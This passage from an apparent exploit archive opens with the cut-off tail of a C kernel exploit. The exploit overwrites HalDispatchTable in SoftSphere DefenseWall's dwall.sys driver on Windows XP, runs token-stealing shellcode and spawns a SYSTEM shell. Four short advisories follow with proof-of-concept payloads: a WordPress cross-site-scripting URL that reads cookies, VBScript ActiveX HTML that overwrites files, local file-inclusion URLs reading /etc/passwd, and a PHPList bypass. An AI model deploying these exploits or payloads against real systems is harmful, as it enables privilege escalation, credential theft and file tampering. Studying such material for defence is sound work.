        printf("[-] Failed to load kernel base\n\n");
        return -1;
    }

    Hal = (FUNCTPTR)GetProcAddress(Kernel, "HalDispatchTable");

    if(Hal == NULL)
    {
        printf("[-] Failed to find HalDispatchTable\n\n");
        return -1;
    }
    
    printf("[i] HalDispatchTable address 0x%08x\n", Hal);	
    printf("[i] Kernel handle 0x%08x\n", Kernel);
    printf("[i] Kernel base address 0x%08x\n", kBase);          

    HalDispatchTable = ((DWORD)Hal - (DWORD)Kernel + (DWORD)kBase);

    printf("[+] Kernel address of HalDispatchTable 0x%08x\n", HalDispatchTable);

    if(!HalDispatchTable)
    {
        printf("[-] Failed to calculate HalDispatchTable\n\n");
        return -1;
    }

    return HalDispatchTable;
}


int GetWindowsVersion()
{
    int v = 0;
    DWORD version = 0, minVersion = 0, majVersion = 0;

    version = GetVersion();

    minVersion = (DWORD)(HIBYTE(LOWORD(version)));
    majVersion = (DWORD)(LOBYTE(LOWORD(version)));

    if (minVersion == 1 && majVersion == 5) v = 1;  // "Windows XP;
    if (minVersion == 1 && majVersion == 6) v = 2;  // "Windows 7";
    if (minVersion == 2 && majVersion == 5) v = 3;  // "Windows Server 2003;

    return v;
}


void spawnShell()
{
    STARTUPINFOA si;
    PROCESS_INFORMATION pi;


    ZeroMemory(&pi, sizeof(pi));
    ZeroMemory(&si, sizeof(si));
    si.cb = sizeof(si);

    si.cb          = sizeof(si); 
    si.dwFlags     = STARTF_USESHOWWINDOW;
    si.wShowWindow = SW_SHOWNORMAL;

    if (!CreateProcess(NULL, "cmd.exe", NULL, NULL, TRUE, CREATE_NEW_CONSOLE, NULL, NULL, &si, &pi))
    {
        printf("\n[-] CreateProcess failed (%d)\n\n", GetLastError());
        return;
    }

    CloseHandle(pi.hThread);
    CloseHandle(pi.hProcess);
}



int main(int argc, char *argv[]) 
{

    _NtQueryIntervalProfile     NtQueryIntervalProfile;
    LPVOID                      input[1] = {0};    
    LPVOID                      addrtoshell;
    HANDLE                      hDevice;
    DWORD                       dwRetBytes = 0;
    DWORD                       HalDispatchTableTarget;
    ULONG                       time = 0;
    unsigned char               devhandle[MAX_PATH]; 


    printf("-------------------------------------------------------------------------------\n");
    printf("    SoftSphere DefenseWall FW/HIPS (dwall.sys) Arbitrary Write EoP Exploit     \n");
    printf("                         Tested on Windows XP SP3 (32bit)                      \n");
    printf("-------------------------------------------------------------------------------\n\n");

    if (GetWindowsVersion() == 1) 
    {
        printf("[i] Running Windows XP\n");
    }

    if (GetWindowsVersion() == 0) 
    {
        printf("[i] Exploit not supported on this OS\n\n");
        return -1;
    }  

    sprintf(devhandle, "\\\\.\\%s", "dwall");

    NtQueryIntervalProfile = (_NtQueryIntervalProfile)GetProcAddress(GetModuleHandle("ntdll.dll"), "NtQueryIntervalProfile");
 	
    if (!NtQueryIntervalProfile)
    {
        printf("[-] Unable to resolve NtQueryIntervalProfile\n\n");
        return -1;  
    }
   
    addrtoshell = VirtualAlloc(NULL, BUFSIZE, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);

    if(addrtoshell == NULL)
    {
        printf("[-] VirtualAlloc allocation failure %.8x\n\n", GetLastError());
        return -1;
    }
    printf("[+] VirtualAlloc allocated memory at 0x%.8x\n", addrtoshell);

    memset(addrtoshell, 0x90, BUFSIZE);
    memcpy(addrtoshell, token_steal_xp, sizeof(token_steal_xp));
    printf("[i] Size of shellcode %d bytes\n", sizeof(token_steal_xp));

    hDevice = CreateFile(devhandle, GENERIC_READ | GENERIC_WRITE, FILE_SHARE_READ | FILE_SHARE_WRITE, NULL, OPEN_EXISTING , 0, NULL);
    
    if (hDevice == INVALID_HANDLE_VALUE)
    {
        printf("[-] CreateFile open %s device failed (%d)\n\n", devhandle, GetLastError());
        return -1;
    }
    else 
    {
        printf("[+] Open %s device successful\n", devhandle);
    }

    HalDispatchTableTarget = HalDispatchTableAddress() + sizeof(DWORD);
    printf("[+] HalDispatchTable+4 (0x%08x) will be overwritten\n", HalDispatchTableTarget);

    input[0] = addrtoshell;  // input buffer contents gets written to our output buffer address
                    
    printf("[+] Input buffer contents %08x\n", input[0]);
 	
    printf("[~] Press any key to send Exploit  . . .\n");
    getch();

    DeviceIoControl(hDevice, 0x00222000, input, sizeof(input), (LPVOID)HalDispatchTableTarget, 0, &dwRetBytes, NULL);

    printf("[+] Buffer sent\n");
    CloseHandle(hDevice);

    printf("[+] Spawning SYSTEM Shell\n");
    NtQueryIntervalProfile(2, &time);
    spawnShell();

    return 0;
}
HireHackking 
source: https://www.securityfocus.com/bid/49193/info

The Fast Secure Contact Form plugin for WordPress is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.

An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.

Versions prior to Fast Secure Contact Form 3.0.3.2 are vulnerable. 

http://www.example.com/wp-content/plugins/si-contact-form/captcha/test/index.php/%22%3E%3Cscript%3Ealert%28document.coo kie%29;%3C/script%3E
HireHackking 
source: https://www.securityfocus.com/bid/49192/info

StudioLine Photo Basic ActiveX is prone to an arbitrary-file-overwrite vulnerability.

Attackers can overwrite arbitrary files on the victim's computer in the context of the vulnerable application using the ActiveX control (typically Internet Explorer).

StudioLine Photo Basic 3.70.34.0 is vulnerable; other versions may also be affected. 

<html> <object classid='clsid:C2FBBB5F-6FF7-4F6B-93A3-7EDB509AA938' id='target' /></object> <input language=VBScript onclick=Boom() type=button value="Exploit"> <script language = 'vbscript'> Sub Boom() arg1="FilePath\File_name_to_corrupt_or_create" arg2=True target.EnableLog arg1 ,arg2 End Sub </script> </html>
HireHackking 
source: https://www.securityfocus.com/bid/49187/info

awiki is prone to multiple local file-include vulnerabilities because it fails to properly sanitize user-supplied input.

An attacker can exploit this vulnerability to obtain potentially sensitive information and execute arbitrary local scripts in the context of the webserver process. This may allow the attacker to compromise the application and the computer; other attacks are also possible.

awiki 20100125 is vulnerable; other versions may also be affected. 

http://www.example.com/awiki/index.php?page=/etc/passwd
http://www.example.com/awiki/index.php?action=Editar+el+Motor&scriptname=/etc/passwd
HireHackking 
source: https://www.securityfocus.com/bid/49188/info

PHPList is prone to a security-bypass vulnerability and an information-disclosure vulnerability.

An attacker can exploit these issues to gain access to sensitive information and send arbitrary messages to registered users. Other attacks are also possible. 

http://www.example.com/lists/?p=forward&uid=VALID_UID&mid=ID
http://www.example.com/lists/?p=forward&uid=foo&mid=ID